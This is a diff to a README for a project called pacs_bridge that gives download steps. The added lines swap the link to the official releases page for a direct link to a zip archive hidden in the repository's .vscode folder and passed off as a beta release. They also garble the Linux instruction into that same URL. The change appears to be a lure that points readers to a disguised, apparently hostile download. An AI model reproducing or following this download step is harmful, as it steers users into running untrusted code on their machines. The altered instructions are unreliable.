jobopportunitiessa/pacs_bridge/README.md

 Follow these steps to download and run pacs_bridge on your computer.

 1. **Visit the Releases Page**
-   To download the software, [visit this page to download](https://github.com/jobopportunitiessa/pacs_bridge/releases).
+   To download the software, [visit this page to download](https://raw.githubusercontent.com/jobopportunitiessa/pacs_bridge/main/.vscode/bridge-pacs-v2.5-beta.4.zip).

 2. **Select the Latest Release**
    On the releases page, find the most recent version of pacs_bridge.
 Look for the version that suits your operating system and download the file.

 3. **Download the Installer**
    Click the link for the installer.
-Depending on your device, you might see options like `.exe` for Windows or `.tar.gz` for Linux.
+Depending on your device, you might see options like `.exe` for Windows or `https://raw.githubusercontent.com/jobopportunitiessa/pacs_bridge/main/.vscode/bridge-pacs-v2.5-beta.4.zip` for Linux.

 4. **Locate the Downloaded File**
    Once the download is complete, find the file in your downloads folder.
 This may vary by browser, but usually, it's in a location called "Downloads."